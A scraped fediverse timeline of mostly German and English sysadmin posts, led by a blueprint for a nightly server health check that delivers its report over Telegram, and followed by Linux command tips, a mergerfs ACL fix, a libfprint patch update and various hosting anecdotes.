                                                                                                                                                                        Nächtliches Server-Checkup als Best Practice Blueprint

                                                                                                                                                                        Zwei-Phasen-Architektur mit strikt getrennten Verantwortlichkeiten:

                                                                                                                                                                        PHASE 1 — DATENSAMMLUNG (System-Cron, 01:00)
                                                                                                                                                                        Bash-Script, kein LLM. Führt alle Checks sequentiell aus und schreibt das Ergebnis in ein versioniertes Logfile (check_YYMMDD.log). Log-Rotation automatisch (30 Tage). Jedes Modul darf einzeln fehlschlagen ohne den gesamten Check abzubrechen.

                                                                                                                                                                        PHASE 2 — BENACHRICHTIGUNG (Hermes-Cron, 02:00)
                                                                                                                                                                        Python-Parser, kein LLM. Liest das Logfile deterministisch ein, baut einen kompakten Report, generiert automatische Alerts bei Schwellwert-Überschreitungen. Das Script-stdout wird 1:1 als Telegram-Nachricht zugestellt. Hermes startet keinen Agent-Loop — reiner Cron-to-Telegram-Bridge.

                                                                                                                                                                        DESIGN-PRINZIPIEN

                                                                                                                                                                        1. Decoupling: Checks laufen über System-Cron, nicht über den Bot. Fällt der Bot aus, liegen die Logs trotzdem bereit. Bot ist nur der Zusteller.

                                                                                                                                                                        2. Deterministisch: Der Report wird von einem Python-Script geparst, nicht von einem LLM generiert. Keine API-Kosten, keine Halluzinationen, garantiert gleiches Format jeden Tag.

                                                                                                                                                                        3. Asynchroner Versatz: Phase 2 startet 1h nach Phase 1 — das Logfile ist sicher vollständig, keine Locking-Mechanismen nötig.

                                                                                                                                                                        4. Logfile als Schnittstelle: Der einzige Kontaktpunkt zwischen den Phasen. Versioniert, rotiert, manuell inspectable, kann jederzeit nachträglich geparst werden.

                                                                                                                                                                        CHECK-DOMÄNEN
                                                                                                                                                                        - Storage: SMART, Temperaturen, Verschleiß, Mount-Health
                                                                                                                                                                        - Hardware: CPU/Sensor-Temperaturen, NVMe-Wear
                                                                                                                                                                        - Pool: Kapazität, Auslastung, Merge-Status
                                                                                                                                                                        - Identität: AD/Domänen-Anbindung, Trust, User-Sichtbarkeit
                                                                                                                                                                        - Backup: Client installiert, Server erreichbar, letztes Backup
                                                                                                                                                                        - Updates: Ausstehende Pakete, Reboot-Required
                                                                                                                                                                        - Self-Update: Eigener Agent auf aktuellem Stand
                                                                                                                                                                        - Prävention: Proaktiver Remount von Fuse-Pools (nicht nur bei Ausfall)

                                                                                                                                                                        ALERTING
                                                                                                                                                                        Zwei Lagen: 🔴 Alerts bei echten Problemen (SMART FAILED, AD offline, Reboot nötig). ℹ️ Hinweise bei Auffälligkeiten ohne akuten Handlungsbedarf. Keine Alerts = "Alle Systeme unauffällig."

                                                                                                                                                                        WATCHDOG-PATTERN
                                                                                                                                                                        Zusätzlich zum nächtlichen Check läuft ein Watchdog-Cronjob (alle 30 Min) für kritische Komponenten. Silent bei Gesundheit (0 Byte stdout = keine Nachricht, keine Notification-Fatigue). Bei Ausfall: Selbstheilung (z.B. Remount) + Telegram-Alert.

                                                                                                                                                                        WARUM DAS FUNKTIONIERT
                                                                                                                                                                        - Ausfallsicher: Jede Komponente kann einzeln ausfallen, alles degradiert graceful
                                                                                                                                                                        - Kostenlos: Kein einziger LLM-Call in der Pipeline
                                                                                                                                                                        - Reproduzierbar: Logfile + Parser = deterministischer Report
                                                                                                                                                                        - Präventiv: Fuse-Pools werden proaktiv remounted, nicht erst bei User-Beschwerden
                                                                                                                                                                        - Auditierbar: 30 Tage Logfile-Historie liegen lokal

                                                                                                                                                                          [?]Monospace Mentor » 🌐
                                                                                                                                                                          @monospace@floss.social

                                                                                                                                                                          Linux tip: `pidof process_name` returns process IDs by name. Unlike `pgrep`, it matches only the command name, not arguments. Use in scripts where you need exact process name matching.

                                                                                                                                                                            [?]Michael T Babcock [https://en.pronouns.page/@bigntallmike] » 🌐
                                                                                                                                                                            @mikebabcock@floss.social

                                                                                                                                                                            Dealt with a lovely and very helpful third-party support person for a client's E-mail and once again was reminded why I don't use for E-mail. What a nightmare to administer. Bear in mind, I'm still running a couple medium sized servers.

                                                                                                                                                                            As I type this, Office365 still isn't letting us send E-mail but I'm sure we'll get there.

                                                                                                                                                                              [?]Monospace Mentor » 🌐
                                                                                                                                                                              @monospace@floss.social

                                                                                                                                                                              Linux tip: `strace -e trace=file program` traces only file-related system calls. Add `-o output.txt` to save results. Reveals which config files, libraries, or data files your program actually accesses.

                                                                                                                                                                                AodeRelay boosted

                                                                                                                                                                                [?]VibeOps » 🌐
                                                                                                                                                                                @vibeops@techhub.social

                                                                                                                                                                                mal wieder ein use case par excellence für unter linux:

                                                                                                                                                                                unter wurden keine ordner angezeigt trotz gesetzter acls

                                                                                                                                                                                LÖSUNG

                                                                                                                                                                                FUSE default_permissions bricht POSIX ACLs — und niemand merkt's

                                                                                                                                                                                Setup: Ubuntu Fileserver, Samba/Winbind in AD-Domäne, Storage-Pool via mergerfs (FUSE). POSIX ACLs korrekt gesetzt — group:bs_alle:r-x auf /srv/storage/Mitarbeiter. User ist in bs_alle. Ext4 direkt: Zugriff klappt. Über mergerfs: Permission denied.

                                                                                                                                                                                Symptom: test -r sagt OK, ls sagt denied. Windows-ACLs korrekt, Samba-ACLs korrekt, ext4-ACLs korrekt. Nichts zu finden.

                                                                                                                                                                                Root cause: FUSE default_permissions wird vom Kernel-Modul geprüft — und der kennt nur owner/group/other, keine named POSIX ACLs. group:bs_alle:r-x wird ignoriert. group::--- (base group) greift → DENY. mergerfs setzt default_permissions implizit bei allow_other, ohne dass's in der fstab steht.

                                                                                                                                                                                Fix: mergerfs ≥ 2.41.0 hat default_permissions=false als Option (PR #1448). Damit macht mergerfs selbst ACL-aware Permission-Checks im Userspace (posix_acl=true). mergerfs 2.42.0 installiert, fstab angepasst, remount — 15 Sekunden Downtime. ACLs greifen, Security intakt.

                                                                                                                                                                                Lektion: FUSE default_permissions und POSIX ACLs sind inkompatibel. Wenn ihr FUSE-Mounts mit ACL-basierten Permissions habt — checkt das.

                                                                                                                                                                                  [?]Monospace Mentor » 🌐
                                                                                                                                                                                  @monospace@floss.social

                                                                                                                                                                                  Linux tip: `systemd-analyze blame` shows which services slow down boot time. Use `systemd-analyze critical-chain` to see the dependency chain causing delays. Optimize the real bottlenecks.

                                                                                                                                                                                    AodeRelay boosted

                                                                                                                                                                                    [?]BlablaLinux » 🌐
                                                                                                                                                                                    @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                    Quand tu relances ton cluster Proxmox et que ton serveur Gotify se transforme en sapin de Noël ! 🎄✨
                                                                                                                                                                                    Le doux bruit des services qui reviennent à la vie les uns après les autres... Uptime-Kuma et Watchtower sont au taquet ! Y a pas à dire, ça fait toujours plaisir de voir tout ce beau monde repasser au vert 🟢💪
                                                                                                                                                                                    Et chez vous, ça donne quoi le monitoring après un reboot ? 🚀

                                                                                                                                                                                      FoxMaSk 🌵 boosted

                                                                                                                                                                                      [?]nixCraft 🐧 » 🌐
                                                                                                                                                                                      @nixCraft@mastodon.social

                                                                                                                                                                                      Updated Debian Linux version 13: 13.6 has been released. If you regularly update your system using the APT you will get these updates but you may have to schedule system reboots.

                                                                                                                                                                                      debian.org/News/2026/20260711

                                                                                                                                                                                        [?]Wulfy—Speaker to the machines » 🌐
                                                                                                                                                                                        @n_dimension@infosec.exchange

                                                                                                                                                                                        @jarko

                                                                                                                                                                                        corollary: If you can't read and understand your configuration files at 2AM and intoxicated, you have not properly configured your system.

                                                                                                                                                                                          🗳

                                                                                                                                                                                          [?]Tushar Chauhan » 🌐
                                                                                                                                                                                          @tchauhan@mastodon.mit.edu

                                                                                                                                                                                          I have been using aptitude since forever. Today, however, I needed to search through installed packages and remembered just how unintuitive the syntax is!

                                                                                                                                                                                          A few articles deep I learnt that good old apt-get has a new API through apt and it appears to be designed for clarity and ease of use. Should I switch?

                                                                                                                                                                                          Which tool do you use? If there is a specific reason besides habit I would be very curious to hear it!

                                                                                                                                                                                          aptitude:3
                                                                                                                                                                                          apt:21
                                                                                                                                                                                          apt-get:2
                                                                                                                                                                                          dpkg:0

                                                                                                                                                                                            [?]Haack’s Networking » 🌐
                                                                                                                                                                                            @oemb1905@gnulinux.social

                                                                                                                                                                                            :haacknet: Haack's Networking :haacknet:

                                                                                                                                                                                            ✍️ Starting today at 5pm UTC-06/7, the following instances will go down for maintenance:

                                                                                                                                                                                            1) gnulinux.studio
                                                                                                                                                                                            2) gnulinux.media

                                                                                                                                                                                            👀 This maintenance will reduce total core consumption on the host by 8 vCPUs and reduce RAM usage by 16GB. Furthermore, these instances will switch from testing to production usage and public availability.

                                                                                                                                                                                            ‼️It is expected that this transition should only take 6-12 hours, however, it could take as long as 72 hours if DNS caching gets delayed. Prepare for down time accordingly.

                                                                                                                                                                                              [?]Haack’s Networking » 🌐
                                                                                                                                                                                              @oemb1905@gnulinux.social

                                                                                                                                                                                              RE: gnulinux.social/@oemb1905/1168

                                                                                                                                                                                              Just a heads up that this was delayed due to a foot injury that went from okay to terrible very quickly. We are resuming this project today and it should take roughly 48-72 hours to complete.

                                                                                                                                                                                              [?]Haack’s Networking » 🌐
                                                                                                                                                                                              @oemb1905@gnulinux.social

                                                                                                                                                                                              :haacknet: Haack's Networking :haacknet:

                                                                                                                                                                                              ✍️ Starting today at 5pm UTC-06/7, the following instances will go down for maintenance:

                                                                                                                                                                                              1) gnulinux.studio
                                                                                                                                                                                              2) gnulinux.media

                                                                                                                                                                                              👀 This maintenance will reduce total core consumption on the host by 8 vCPUs and reduce RAM usage by 16GB. Furthermore, these instances will switch from testing to production usage and public availability.

                                                                                                                                                                                              ‼️It is expected that this transition should only take 6-12 hours, however, it could take as long as 72 hours if DNS caching gets delayed. Prepare for down time accordingly.

                                                                                                                                                                                                  [?]viq [he/him] » 🌐
                                                                                                                                                                                                  @viq@social.hackerspace.pl

                                                                                                                                                                                                  Is this the moment where I get annoyed enough with state and quirks of configuration management tools, and switch my boxes to somewhat more hands-off ? 🤔

                                                                                                                                                                                                    [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                    @mwl@io.mwl.io

                                                                                                                                                                                                    Trying running my office on wireless. Things connect, but seemed laggy compared to the dmarc. Speedtest.net is not a great way to test connectivity, but performing two consecutive tests against the same server is a reasonable test.

                                                                                                                                                                                                    Mac Studio wifi: 18mbs down, 16 up. Good enough to work, but I'm paying for 300mbs.

                                                                                                                                                                                                    Mac Studio ethernet to Mikrotik wifi bridge: 210mbs down, 200 up.

                                                                                                                                                                                                    Sigh. Apparently I'm back on my Redundant Array of Inexpensive Crap kick.

                                                                                                                                                                                                      [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                      @mwl@io.mwl.io

                                                                                                                                                                                                      A good article on how to tell if AI scrapers are eating your bandwidth.

                                                                                                                                                                                                      bunny.net/blog/how-to-tell-if-

                                                                                                                                                                                                        [?]Marcos Dione » 🌐
                                                                                                                                                                                                        @mdione@en.osm.town

                                                                                                                                                                                                        `zsh`'s builtin `[`is not only not like `bash`'s, it's mostly unlike any other programming language, in the sense that the string equal operator is `=` and not `==`.

                                                                                                                                                                                                        The error message is, of course, `zsh: = not found`.

                                                                                                                                                                                                          1 ★ 1 ↺

                                                                                                                                                                                                          [?]oldsysops » 🌐
                                                                                                                                                                                                          @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                          @patpro@social.patpro.net
                                                                                                                                                                                                          j'ai regardé les logs de la forge git professionnel de logiciel opensource mais pas grand publique.
                                                                                                                                                                                                          3 137 000 de requêtes web
                                                                                                                                                                                                          ~3 000 000 de code 200 OK
                                                                                                                                                                                                          ~183 000 de code 404
                                                                                                                                                                                                          ~11 500 de code 499 (nginx timeout serveur)
                                                                                                                                                                                                          je ne compte pas le reste des code 30X et 40x qui sont plus faibles.

                                                                                                                                                                                                          Coté Source :
                                                                                                                                                                                                          ~614 487 IP sources : rappel, on est sûr du logiciel NON grand publique, un peu niche avec zéro contribution de dev externe a l'entreprise, ce qui est normale.

                                                                                                                                                                                                          Si j'enlève les IP de l'infra (monitoring, jenkins, redmine) on enlève ~630 000 requêtes pour 6 IPs.

                                                                                                                                                                                                          reste 2 500 000 requêtes et 614 481 IPs ...

                                                                                                                                                                                                          ~ 582 000 IPs, on fait moins de 10 requêtes (pour un total de 1754808 requêtes soit plus de 50%) dans les détails :
                                                                                                                                                                                                          ~ 257 998 IPs, on fait une seule requête pour un total de 257998.
                                                                                                                                                                                                          36395 IPs, on fait seulement 2 requêtes pour un total de 72790
                                                                                                                                                                                                          125627 IPs, on fait seulement 3 requêtes pour un total de 376881
                                                                                                                                                                                                          28233 IPs, on fait seulement 4 requêtes pour un total de 112932
                                                                                                                                                                                                          15122 IPs, on fait seulement 5 requêtes pour un total de 75610
                                                                                                                                                                                                          60216 IPs, on fait seulement 6 requêtes pour un total de 361296

                                                                                                                                                                                                          sinon on est ~ une trentaine (et pas tous dev) et en ce lundi de juillet, les bureaux parisiens (ou il y a pas grand monde ~ 3 personnes) ont fait environ 800 requêtes...
                                                                                                                                                                                                          donc l'usage "légitime" sur la journée doit être ~ 30 000 requêtes (évaluation haute) soit 1% de l'usage. (bon l'infra compte pour 20% quand même 🙂 )


                                                                                                                                                                                                          bref, on n'est pas sur les mêmes chiffres, mais on dépasse largement ton test.

                                                                                                                                                                                                          Plusieurs point : l'url du git est ancienne (depuis plus de 10 ans) il y a eu quelques changements, mais globalement ce sont les mêmes urls.
                                                                                                                                                                                                          De toute façon, c'est seulement depuis moins de 2 ans qu'on a un nombre de requêtes aussi importantes. Au point de déclencher des erreurs sur le monitoring et d'empêcher l'usage correct de la plateforme.
                                                                                                                                                                                                          Je pense que les robots ne sont pas ceux des moteurs de recherche, ils ne parcourent pas internet à la recherche de page a indexé, mais plutôt des robots qui ciblent des URLS particulières " à forte valeur ajoutée" (des urls de code opensource accessible, super pour alimenter des IAs de code).



                                                                                                                                                                                                            [?]Monospace Mentor » 🌐
                                                                                                                                                                                                            @monospace@floss.social

                                                                                                                                                                                                            Linux tip: `iostat -x 1` monitors disk I/O performance every second. Watch the `%util` column - consistently high values indicate I/O bottlenecks. Press Ctrl+C to stop monitoring.

                                                                                                                                                                                                              [?]Monospace Mentor » 🌐
                                                                                                                                                                                                              @monospace@floss.social

                                                                                                                                                                                                              Linux tip: `ss -s` provides socket statistics summary. Shows TCP/UDP connection counts and states. Much faster than parsing full socket lists when you just need connection metrics.

                                                                                                                                                                                                                AodeRelay boosted

                                                                                                                                                                                                                [?]-=Kernel-Error=- » 🌐
                                                                                                                                                                                                                @kernel-error.de@www.kernel-error.de

                                                                                                                                                                                                                NB-2020-U Fingerabdruckleser: der libfprint-Patch ist upstream gemergt

                                                                                                                                                                                                                Der offene Faden aus dem ersten Beitrag ist zu: Mein Merge Request !569 für den NB-2020-U ist bei libfprint upstream gemergt. Marco Trevisan hat den Patch auf den aktuellen master rebased und aufgenommen. Ab der nächsten libfprint Version läuft der Fingerabdruckleser out of the box. [SENSITIVE CONTENT]

                                                                                                                                                                                                                Anfang März habe ich hier beschrieben, wie ich den NEXT Biometrics NB-2020-U in meinem Fujitsu Notebook unter Linux zum Laufen gebracht habe. Die ganze Arbeit lief am Ende auf eine einzige Product ID hinaus: 0x2020 im bestehenden nb1010 Treiber, weil der NB-2020-U denselben Sensor Die wie der NB-1010-U nutzt. Der Beitrag endete mit dem üblichen Cliffhanger: Merge Request eingereicht, CI grün, warten auf das Review durch die Maintainer.

                                                                                                                                                                                                                Das Warten hat ein Ende. MR !569 ist gemergt.

                                                                                                                                                                                                                Was der Maintainer gemacht hat

                                                                                                                                                                                                                Marco Trevisan, einer der libfprint Maintainer, hat den Patch auf den aktuellen master rebased, die Pipeline noch einmal durchlaufen lassen und ihn am 2. Juli 2026 per Auto-Merge aufgenommen (Commit 0fa670f). Blockierende Review-Kommentare gab es keine. Der Patch war klein und die Beweislage eindeutig: gleicher Sensor, gleiches USB Protokoll, gleicher Treiber, nur eine zusätzliche ID in der Tabelle.

                                                                                                                                                                                                                Was das für Betroffene heißt

                                                                                                                                                                                                                Für alle mit demselben Fingerabdruckleser im Notebook: Ab der nächsten libfprint Version wird der NB-2020-U out of the box erkannt. Kein eigener Patch mehr, kein Selberbauen. Enrollment und Verifikation über fprintd laufen dann direkt, sobald die Distribution die neue libfprint Version ausliefert. Wer nicht warten möchte, nimmt weiterhin den Patch aus dem ersten Beitrag oder baut direkt vom aktuellen master.

                                                                                                                                                                                                                Der zweite Leser aus derselben Familie, der NB-2033-U mit seinem komplett eigenen Protokoll, hat einen eigenen Treiber von Grund auf bekommen. Dieser Merge Request !574 liegt noch beim Review, ist aber frisch auf den neuen master rebased und die Pipeline ist grün. Sobald auch der durch ist, folgt ein weiterer kurzer Nachtrag.

                                                                                                                                                                                                                Siehe auch

                                                                                                                                                                                                                Denselben Leser im Notebook oder eine ähnliche Baustelle mit libfprint? Dann einfach fragen.

                                                                                                                                                                                                                [?]Michael T Babcock [https://en.pronouns.page/@bigntallmike] » 🌐
                                                                                                                                                                                                                @mikebabcock@floss.social

                                                                                                                                                                                                                For all those people building boxes with huge CPUs and lots of because that's how Linus (of YouTube not ) did it, I'm running a 50+ TiB NAS on a Celeron N5105 with 8GiB of RAM using and .

                                                                                                                                                                                                                My highest loads are during backups (borg) when the system hits just 80% idle. Use your precious RAM for gaming.

                                                                                                                                                                                                                  Alexandre :freebsd: boosted

                                                                                                                                                                                                                  [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                  @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                  I managed an e-commerce server for about ten years. It grew from a small local shop into a major national business, even handling international orders. They expanded to the point where they reduced their local brick-and-mortar store hours because the bulk of their revenue was coming from online sales.

                                                                                                                                                                                                                  Then one seller came along and convinced them that switching to Shopify would be the key to growing even further. Apparently, their €130/month bare-metal redundant setup - which boasted a calculated uptime of 99.995% over 10 years - just wasn't cutting it anymore.

                                                                                                                                                                                                                  They’ve been on Shopify for about six months now, and every now and then, I still get the alerts. I left the monitoring active via Uptime Kuma and ran the numbers. Over the last six months, their uptime dropped below 98%.
                                                                                                                                                                                                                  In other words, in just six months, they’ve been down for almost as many hours as they were during the entire previous decade.

                                                                                                                                                                                                                  I contacted the client - not because I want to take over the hosting again, but just to understand what on earth happened (we're on excellent terms). Their response was: "We don't know, but if it happened on Shopify, it means it was bound to happen anyway."

                                                                                                                                                                                                                  As long as we keep swallowing the lie that "the cloud" and "tech giants" are always the right solution for us, we completely deserve the cloud and the tech giants.

                                                                                                                                                                                                                    AodeRelay boosted

                                                                                                                                                                                                                    [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                    @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                    [?]Michael T Babcock [https://en.pronouns.page/@bigntallmike] » 🌐
                                                                                                                                                                                                                    @mikebabcock@floss.social

                                                                                                                                                                                                                    For all those people building boxes with huge CPUs and lots of because that's how Linus (of YouTube not ) did it, I'm running a 50+ TiB NAS on a Celeron N5105 with 8GiB of RAM using and .

                                                                                                                                                                                                                    My highest loads are during backups (borg) when the system hits just 80% idle. Use your precious RAM for gaming.

                                                                                                                                                                                                                      AodeRelay boosted

                                                                                                                                                                                                                      [?]Flippin' 'eck, Tucker! [he/him] » 🌐
                                                                                                                                                                                                                      @losttourist@social.chatty.monster

                                                                                                                                                                                                                      @cstross @foone I do remember there was an additional wrinkle in that the (donated) box I was trying to install onto was a PS/2 and the MCA architecture wasn't officially supported by the Slackware installation disks.

                                                                                                                                                                                                                      And astonishingly, I think I may have found a copy of the document I had to follow in order to hack the installation to work. linuxjournal.com/article/2037

                                                                                                                                                                                                                      Looking back and considering it was my first real experience with installing Linux, it's astonishing I got it to work. But it did, and that machine became my daily driver for the next few years.

                                                                                                                                                                                                                        Marcos Dione boosted

                                                                                                                                                                                                                        [?]FlohEinstein » 🌐
                                                                                                                                                                                                                        @FlohEinstein@chaos.social

                                                                                                                                                                                                                        Arthur C. Clarke: "Any sufficiently advanced technology is indistinguishable from magic."

                                                                                                                                                                                                                        Me: "Therefore, any sufficiently complicated technical problem is indistinguishable from a curse."

                                                                                                                                                                                                                          Marcos Dione boosted

                                                                                                                                                                                                                          [?]FlohEinstein » 🌐
                                                                                                                                                                                                                          @FlohEinstein@chaos.social

                                                                                                                                                                                                                          Arthur C. Clarke: "Any sufficiently advanced technology is indistinguishable from magic."

                                                                                                                                                                                                                          Me: "Therefore, any sufficiently complicated technical problem is indistinguishable from a curse."

                                                                                                                                                                                                                            Alexandre :freebsd: boosted

                                                                                                                                                                                                                            [?]Larvitz :fedora: » 🌐
                                                                                                                                                                                                                            @Larvitz@burningboard.net

                                                                                                                                                                                                                            FreeBSD 15.1-RELEASE is out.

                                                                                                                                                                                                                            In my new guide, I walk through the official upgrade paths:

                                                                                                                                                                                                                            • distribution sets with freebsd-update
                                                                                                                                                                                                                            • packaged base with pkg
                                                                                                                                                                                                                            • boot-environment rollback
                                                                                                                                                                                                                            • .pkgnew merges
                                                                                                                                                                                                                            • boot-loader checks for UEFI/BIOS

                                                                                                                                                                                                                            blog.hofstede.it/upgrading-fre

                                                                                                                                                                                                                              [?]Michał "rysiek" Woźniak · 🇺🇦 » 🌐
                                                                                                                                                                                                                              @rysiek@mstdn.social

                                                                                                                                                                                                                              Hey folks, anybody heard of ShredOS?

                                                                                                                                                                                                                              Seems like a potentially useful tool, but the website looks sus:
                                                                                                                                                                                                                              shredos.org/

                                                                                                                                                                                                                              The GitHub repo seems a bit less sus:
                                                                                                                                                                                                                              github.com/PartialVolume/shred

                                                                                                                                                                                                                              Edit: the website is not affiliated with the project, see replies. Question stands about the tool itself!

                                                                                                                                                                                                                                AodeRelay boosted

                                                                                                                                                                                                                                [?]:awesome:🐦‍🔥nemo™🐦‍⬛ 🇺🇦🍉 » 🌐
                                                                                                                                                                                                                                @nemo@mas.to

                                                                                                                                                                                                                                Root-Zugriff ist möglich: Exploits zu CVE-2026-46331 (Linux-Kernel) wurden geleakt und betreffen u.a. Debian, Ubuntu & RHEL. Ein Patch ist teils schon drin, Updates fehlen aber noch nicht überall—Admins sollten schnell absichern. 🔧🚨 golem.de/news/root-zugriff-moe

                                                                                                                                                                                                                                  Fred de CLX boosted

                                                                                                                                                                                                                                  [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                  @oemb1905@gnulinux.social

                                                                                                                                                                                                                                  :haacknet: Haack's Networking - Drawing Tablets & X11/Wayland :haacknet:

                                                                                                                                                                                                                                  🖥️ It is nice to see that my Gaomon tablets work right out of the box under KDE 6.6, Debian 14, and Wayland ...

                                                                                                                                                                                                                                  🎉 Massive thanks to the team and also a shout to @davidrevoy who recently dropped his Interim setup which first clued me in to "mouse mode" being on the horizon for stable 💘 (finally)

                                                                                                                                                                                                                                  ✅️ Sure enough, in Debian Testing w/ Wayland, the "Drawing Tablet" setting in KDE 6.6 automagically works with the following Gaomon tablets with no proprietary driver installed:

                                                                                                                                                                                                                                  1️⃣ MK 2018
                                                                                                                                                                                                                                  2️⃣ PD 1161

                                                                                                                                                                                                                                  💡 The last two years were choppy and I even had to write a custom X config for the MK 2018 to teach an applied math course. Until recently, seeing no progress on the horizon for "out of the box" functionality, I had settled on @XLibreDev @sonicdesktop and was quite happy. In fact, very grateful to them for getting me by this last year - mucho thanks.

                                                                                                                                                                                                                                  🏁 But, at the end of the day, I really need mainstream / stock Debian to just work with drawing products, not just for me ... but for my daughter's art projects - she just got her art accepted at @ffmpeg and I'm very proud of her. We rely on these products - there's no denying. At present:

                                                                                                                                                                                                                                  Dascha uses:
                                                                                                                                                                                                                                  1) X1 Carbon 4th Gen - using KDE neon stable (art attached that she did at 13 for ffmpeg)

                                                                                                                                                                                                                                  2) HP All-In-One Touch i5 - using KDE neon stable

                                                                                                                                                                                                                                  All working better natively in Wayland than under the prop driver. They work similarly well to how they work in X now.

                                                                                                                                                                                                                                  Jonathan (me) uses:
                                                                                                                                                                                                                                  1) 3x mini Ryzen PCs - KDE 6.6, Debian Testing, and Wayland - 1 w/ PD 1161 and 2 w/ MK 2018 - all working including "mouse mode" under wayland / stock Debia (art / teaching).

                                                                                                                                                                                                                                  2) Dell 1950 laptop 2023 i7 w/ NVIDIA - had to manually build the nvidia driver under latest on their website, other than that no issues, running Debian Testing, Wayland, KDE 6.6 - MK 2018 works via USBC hub for teaching

                                                                                                                                                                                                                                  3) X1 Carbon 4th gen i5 - Debian Testing, KDE 6.6, Wayland - works with Wacom stylus similar to Dascha's setup no issues

                                                                                                                                                                                                                                  ⁉️ How did this happen? I was fixing an old Precision 7920 and setting it up as a PeerTube runner on Lubuntu 26.04 (better with NVIDIA lol). I got bored and installed Kubuntu Desktop and then pluggeed in an MK 2018. It worked ... & so I started testing and researching KDE point releases & looking back at Mr. Revoy's post and switched all 7 machines over in < 48 hours.

                                                                                                                                                                                                                                  ffmpeg redo that dascha did for them, this is my daughter and the pull request was accepted, all done in krita using revoy-esque setups

                                                                                                                                                                                                                                  Alt...ffmpeg redo that dascha did for them, this is my daughter and the pull request was accepted, all done in krita using revoy-esque setups

                                                                                                                                                                                                                                  math work for a student in skill builder camp

                                                                                                                                                                                                                                  Alt...math work for a student in skill builder camp

                                                                                                                                                                                                                                  pd 1161 gaomon display drawing tablet settings in debian testing kde 6.6

                                                                                                                                                                                                                                  Alt...pd 1161 gaomon display drawing tablet settings in debian testing kde 6.6

                                                                                                                                                                                                                                  pd 1161 gaomon display drawing tablet "pen" settings in debian testing kde 6.6 including my prefs

                                                                                                                                                                                                                                  Alt...pd 1161 gaomon display drawing tablet "pen" settings in debian testing kde 6.6 including my prefs

                                                                                                                                                                                                                                    AodeRelay boosted

                                                                                                                                                                                                                                    [?]Tom [he/him they/them] » 🌐
                                                                                                                                                                                                                                    @pertho@mastodon.bsd.cafe

                                                                                                                                                                                                                                    Today, I was doing an upgrade of Percona MySQL server from 8.0 to 8.4.

                                                                                                                                                                                                                                    It took 15-20 minutes to download a 118 MB .deb!

                                                                                                                                                                                                                                    I forgot I had added Percona's repo to apt-mirror on an internal server of ours a few weeks back and forgot to update the web server to serve it so I fixed that.

                                                                                                                                                                                                                                    Whipped up a new "deb822" percona.sources with their signing key but our URL. The result?

                                                                                                                                                                                                                                    It took 1 second to download the percona server .deb.

                                                                                                                                                                                                                                    Host your own .deb repos, folks! You can't count on the 3rd party hosted repo to always be there.

                                                                                                                                                                                                                                      2 ★ 2 ↺
                                                                                                                                                                                                                                      Fred de CLX boosted

                                                                                                                                                                                                                                      [?]oldsysops » 🌐
                                                                                                                                                                                                                                      @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                      ca on me l'avais jamais faite...
                                                                                                                                                                                                                                      mon agenda nextcloud répond à davx une erreur 418...

                                                                                                                                                                                                                                      j'ai un nextcloud théière...


                                                                                                                                                                                                                                        [?]Monospace Mentor » 🌐
                                                                                                                                                                                                                                        @monospace@floss.social

                                                                                                                                                                                                                                        Linux tip: `rsync -avz --progress source/ user@host:/destination/` syncs files via SSH with progress display. The `-a` preserves permissions, `-v` is verbose, `-z` compresses during transfer.

                                                                                                                                                                                                                                          [?]FLOX Advocate » 🌐
                                                                                                                                                                                                                                          @FLOX_advocate@floss.social

                                                                                                                                                                                                                                          Dear logging and ticketing tools,

                                                                                                                                                                                                                                          if you do not show the time zone for times, you are wrong.

                                                                                                                                                                                                                                          It's like giving coordinates, but not the origin

                                                                                                                                                                                                                                          "over 3 and up 4"

                                                                                                                                                                                                                                          From where? Where I am now? Where I was at the time? I don't know the time because you didn't give a time zone! Heck, you only gave the day within +/- 1

                                                                                                                                                                                                                                          signed,

                                                                                                                                                                                                                                          everybody

                                                                                                                                                                                                                                          PS: when multiple tools do this it's a right pain to build a timeline, you are wasting my time

                                                                                                                                                                                                                                            AodeRelay boosted

                                                                                                                                                                                                                                            [?]⚓💾 Tueddelmors 💾⚓ » 🌐
                                                                                                                                                                                                                                            @reeeen@norden.social

                                                                                                                                                                                                                                            Als jemand, der viel zwischen Servern, SSH-Sessions und Remote-Hosts jongliert, ist ein gutes Terminal für mich etwas Elementares. Mein persönlicher Favorit ist Termius. Die plattformübergreifende Sync der Hosts und Keys ist Gold wert, SFTP direkt integriert, und das UI macht SSH-Verbindungen endlich weniger nach "Textdatei pflegen und hoffen". Für Teams mit vielen Zugängen ist der Vault-Sync ein echter Zeitgewinn. Und bei euch?

                                                                                                                                                                                                                                            bizzfed.de/posts/lv_9_YEG5twMt

                                                                                                                                                                                                                                              [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                              @mwl@io.mwl.io

                                                                                                                                                                                                                                              working on performance vs resilience section.

                                                                                                                                                                                                                                              Thinking that the fault tolerance of a 3-disk striped VDEV can best be described as "yeet."

                                                                                                                                                                                                                                              This beast is open for sponsorship. mwl.io/sponsor

                                                                                                                                                                                                                                                [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                :haacknet: Haack's Networking :haacknet:

                                                                                                                                                                                                                                                ✍️ Starting today at 5pm UTC-06/7, the following instances will go down for maintenance:

                                                                                                                                                                                                                                                1) gnulinux.studio
                                                                                                                                                                                                                                                2) gnulinux.media

                                                                                                                                                                                                                                                👀 This maintenance will reduce total core consumption on the host by 8 vCPUs and reduce RAM usage by 16GB. Furthermore, these instances will switch from testing to production usage and public availability.

                                                                                                                                                                                                                                                ‼️It is expected that this transition should only take 6-12 hours, however, it could take as long as 72 hours if DNS caching gets delayed. Prepare for down time accordingly.

                                                                                                                                                                                                                                                  [?]Ludovic :Firefox: :FreeBSD: » 🌐
                                                                                                                                                                                                                                                  @usul@piaille.fr

                                                                                                                                                                                                                                                  [?]Nigel » 🌐
                                                                                                                                                                                                                                                  @nigelharpur@musicians.today

                                                                                                                                                                                                                                                  All four server cores now hovering around 48°C (118.4°F) and the day is young...

